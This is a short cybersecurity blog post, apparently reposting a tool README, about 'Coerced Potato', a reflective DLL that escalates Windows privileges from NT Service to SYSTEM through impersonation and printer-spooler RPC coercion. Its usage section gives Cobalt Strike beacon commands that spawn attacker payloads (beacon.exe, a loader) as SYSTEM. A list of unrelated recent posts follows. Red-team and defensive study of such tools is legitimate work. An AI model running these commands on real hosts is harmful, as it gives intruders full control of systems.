Cyber security

Coerced Potato Reflective DLL – Unveiling Privilege Escalation From NT Service To SYSTEM

Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.

Heavily based

Reflective Loader from

Install

Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna into CobaltStrike.

Usage

You first need to spawn the RPC listener with

beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument

for example

beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin

then you can trigger a SYSTEM call

beacon> CoercedPotato coerce
Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

WhatsMyName App – Find Anyone Across 640+ Platforms

Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…

2 weeks ago

Analyzing Directory Size Linux Tools Explained

Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…

2 weeks ago

Understanding Disk Usage with du Command

Efficient disk space management is vital in Linux, especially for system administrators who manage servers…

2 weeks ago

How to Check Directory Size in Linux

Knowing how to check directory sizes in Linux is essential for managing disk space and…

2 weeks ago

Essential Commands for Linux User Listing

Managing user accounts is a core responsibility for any Linux administrator. Whether you’re securing a…

2 weeks ago

Command-Line Techniques for Listing Linux Users

Linux offers powerful command-line tools for system administrators to view and manage user accounts. Knowing…

2 weeks ago